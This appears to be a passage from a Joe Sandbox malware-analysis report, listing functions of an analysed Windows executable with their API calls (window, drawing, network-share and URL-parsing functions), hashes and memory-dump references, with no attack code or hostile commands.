                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f8f04935ccc98a16c57468f2dc897e8669b417dbef2167808835c06230567052
                                                                                                                                                                                                                                                                                                    • Instruction ID: 865ddaf7e2815677f4e04f57b115dd2fc5323bdb55bf0f3df0e22617a1ae5f10
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f04935ccc98a16c57468f2dc897e8669b417dbef2167808835c06230567052
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B11140B9D0020AAFDB41CFA8C884AEEBBB5FF09310F508166E955E3650D735AA55CF50
                                                                                                                                                                                                                                                                                                    Function 00A736F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A73712
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A73723
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A7372A
                                                                                                                                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A73731
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 10682d683dae73c79f178502985831ae4b32fdfc2aa73c66dc4e5d401875aa37
                                                                                                                                                                                                                                                                                                    • Instruction ID: 88633e3a6269de797d3ae4ae3f7ef4a9cce02110766e6f574eeee6761ecf4956
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10682d683dae73c79f178502985831ae4b32fdfc2aa73c66dc4e5d401875aa37
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE06DB21012247ADA249BA29C4DEEBBF6CDB43BA1F018019F10AE24C0DBA08941D2B1
                                                                                                                                                                                                                                                                                                    Function 00AA92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A11F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: BeginPath.GDI32(?), ref: 00A11FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AA92E3
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00AA92F0
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00AA9300
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00AA930E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7296ecf21986d914636f1407cfd7c54232d75cbf5dad3631edfd11b254b6a62e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 767de12d75ee949c47415a999010bd2ef30cb6d5a728fa833dfa9f142fe2df40
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7296ecf21986d914636f1407cfd7c54232d75cbf5dad3631edfd11b254b6a62e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6F05E31045259BADB129F94AC0EFCE3F69AF0B320F048100FA52250E2C77595639BA5
                                                                                                                                                                                                                                                                                                    Function 00A121A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 00A121BC
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00A121C6
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00A121D9
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00A121E1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: be00b92518d19bbe9d7033fce2c53bb04ec1f9871650b88a698916f5619b57fb
                                                                                                                                                                                                                                                                                                    • Instruction ID: db4fecdc55eba91e0c7fbb63b7732e2b769d44804cc70078fe93be0d69f9dcdb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be00b92518d19bbe9d7033fce2c53bb04ec1f9871650b88a698916f5619b57fb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BE06532240241BEDB219BB4AC097E97B11AB53336F14831DF7F7584E0C77186469B10
                                                                                                                                                                                                                                                                                                    Function 00A6EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A6EC36
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A6EC40
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A6EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00A6EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: be15c520bbb000c087b93056dcb4948a49114df7e497f31f021c44cfc65ebf08
                                                                                                                                                                                                                                                                                                    • Instruction ID: 225630de0b6eb1f178021300e7444ad6181b8bd8d1d77314594d22fea107cd8f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be15c520bbb000c087b93056dcb4948a49114df7e497f31f021c44cfc65ebf08
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98E01AB4C00205DFCB40EFA0D908A9DBBB1EB48311F108419E98BE3690D7385952AF00
                                                                                                                                                                                                                                                                                                    Function 00A6EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A6EC4A
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A6EC54
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A6EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00A6EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5bc833cec4ca5f7adeb2bf9d0d802574790a357e1b942ec9f797608e8296cbbe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 239e5da1b5648fc3daad28de5008efce8cae4439f6bb6bee45be9a0cb33d700d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bc833cec4ca5f7adeb2bf9d0d802574790a357e1b942ec9f797608e8296cbbe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E01AB0C00205DFCB40DFA0D908A9DBBB1AB48310B108419E88BE3690D73859429F00
                                                                                                                                                                                                                                                                                                    Function 00A857CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A85919
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                    • Opcode ID: b483559ca1595a874bb0eca9fd9107decb2447293d0c61e8725dffe298c0d409
                                                                                                                                                                                                                                                                                                    • Instruction ID: 43a9284610532fcdea3e018f69838fa026a33d58d65f5d2260ed5cbd28370947
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b483559ca1595a874bb0eca9fd9107decb2447293d0c61e8725dffe298c0d409
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF916B75E00604DFCB14EF64C4D4EAABBF1AF44354F188099E84A9B3A2D775EE85CB90
                                                                                                                                                                                                                                                                                                    Function 00A3E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00A3E67D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0e300ef00e9fe7b250b33dafa44e9952e9e4c947adff21777421853799e45715
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24934c8c977b1e66ed3b4f676d06e6d12b18141ec8f21abb3078bcbbaacb2e68
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e300ef00e9fe7b250b33dafa44e9952e9e4c947adff21777421853799e45715
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E518F75E1910286CB15F718EE423BE2BB4ABD0740F304F5AF092462F9DF398D969B46
                                                                                                                                                                                                                                                                                                    Function 00A2A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                    • Opcode ID: c6a369610381837793b249010dc5301a4a605981deeb09876274c634d8aec9ad
                                                                                                                                                                                                                                                                                                    • Instruction ID: 34c154ff6d3aab4cbc539d1b1dcecbdd206af2c8ef1acee44983539db77cb803
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a369610381837793b249010dc5301a4a605981deeb09876274c634d8aec9ad
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C513131604256DFCB25DF28D445AFA7BB8EF25310F248166F8919B2D0DF389D82CB61
                                                                                                                                                                                                                                                                                                    Function 00A2F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00A2F6DB
                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A2F6F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b71bc4d1c8fdb5fe30f752187c3ebf8b5c1331d8e80d603ded60d27b2587233
                                                                                                                                                                                                                                                                                                    • Instruction ID: 794cf2b03c4bcb38b4bd09f18157a1b28ec8c51cfce31f16b12aba4aeb1c3565
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b71bc4d1c8fdb5fe30f752187c3ebf8b5c1331d8e80d603ded60d27b2587233
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA5115714087489BD320AF50DD86BABBBF8FF94344F82485DF599421A1DF308969CB66
                                                                                                                                                                                                                                                                                                    Function 00A961A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                    • Opcode ID: e88c94bdca056966352f1a20a51d5f706016bda9e61a4325f399cea29fd89124
                                                                                                                                                                                                                                                                                                    • Instruction ID: 567ecb001dd664c05f2c782d46f05203e6330f094fcc59eae3159cf1b4cdc1bf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e88c94bdca056966352f1a20a51d5f706016bda9e61a4325f399cea29fd89124
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38419C71E002199FCF04EFA8C9959EEBBF5FF59364F104169E406AB291EB709D81CB90
                                                                                                                                                                                                                                                                                                    Function 00A8DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A8DB75
                                                                                                                                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A8DB7F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6200927edc2f0db4f950bfc27ff78414af553fcb069fa1a59bf6404d8ac1343f
                                                                                                                                                                                                                                                                                                    • Instruction ID: ec63de43e21cff36e2b48229d8c30d5904b9f702991ab8f5b9e7e4354536b6a5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6200927edc2f0db4f950bfc27ff78414af553fcb069fa1a59bf6404d8ac1343f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0313C71801119ABCF15EFB4CD85AEEBFB9FF04344F100029F815A61A2EB759A56DB60
                                                                                                                                                                                                                                                                                                    Function 00AA4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00AA40BD
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AA40F8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
